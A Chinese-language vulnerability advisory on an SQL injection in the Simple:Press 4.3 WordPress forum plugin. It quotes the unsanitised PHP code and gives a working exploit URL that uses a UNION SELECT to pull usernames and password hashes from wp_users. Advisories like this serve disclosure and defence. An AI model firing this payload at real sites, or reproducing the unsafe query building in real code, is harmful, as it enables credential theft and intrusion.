WordPress Simple:Press插件value参数SQL注入漏洞
添加时间:
2010-07-06
系统编号:
WAVDB-01677
BUGTRAQ: 41348
影响版本:
Simple:Press 4.3
程序介绍:
漏洞利用:
2010-07-06
系统编号:
WAVDB-01677
BUGTRAQ: 41348
影响版本:
Simple:Press 4.3
程序介绍:
WordPress是一款免费的论坛Blog系统。
漏洞分析:
WordPress所使用的Simple:Press插件没有正确地过滤用户在搜索字段所输入的搜索变量便注入到了SQL查询中使用:
sf-header-forum.php
---[snip]---
385 # Add Search Vars
386 if(isset($_GET['search']))
387 {
388 if($_GET['search'] != '') $sfvars['searchpage'] =
sf_esc_int($_GET['search']);
389 if(isset($_GET['value']) ? $sfvars['searchvalue'] =
stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] =
'');
390 if(isset($_GET['type']) ? $sfvars['searchtype'] =
sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);
400 if(isset($_GET['include']) ? $sfvars['searchinclude'] =
sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);
401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;
402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;
403 } else {
---[snip]---
在389行,HTTP GET请求value被定义为全局变量$sfvars['searchvalue'],但在sf-database.php文件中将其注入到了SQL查询中:
sf-database.php
---[snip]---
...
401 $searchvalue=urldecode($sfvars['searchvalue']);
...
404 if($sfvars['searchtype'] == 6)
...
409 $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";
410
411 } elseif($sfvars['searchtype'] == 8)
...
414 $userid = $sfvars['searchvalue'];
415 $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
416 $MATCH = "";
417 $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";
418
419 } elseif($sfvars['searchtype'] == 9)
...
422 $userid = $sfvars['searchvalue'];
...
425 $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";
...
---[snip]---
漏洞利用:
http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
解决方案:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://simple-press.com/
信息来源:
<*来源:Canberk BOLAT
链接:http://secunia.com/advisories/40446/
http://www.exploit-db.com/exploits/14198/
*>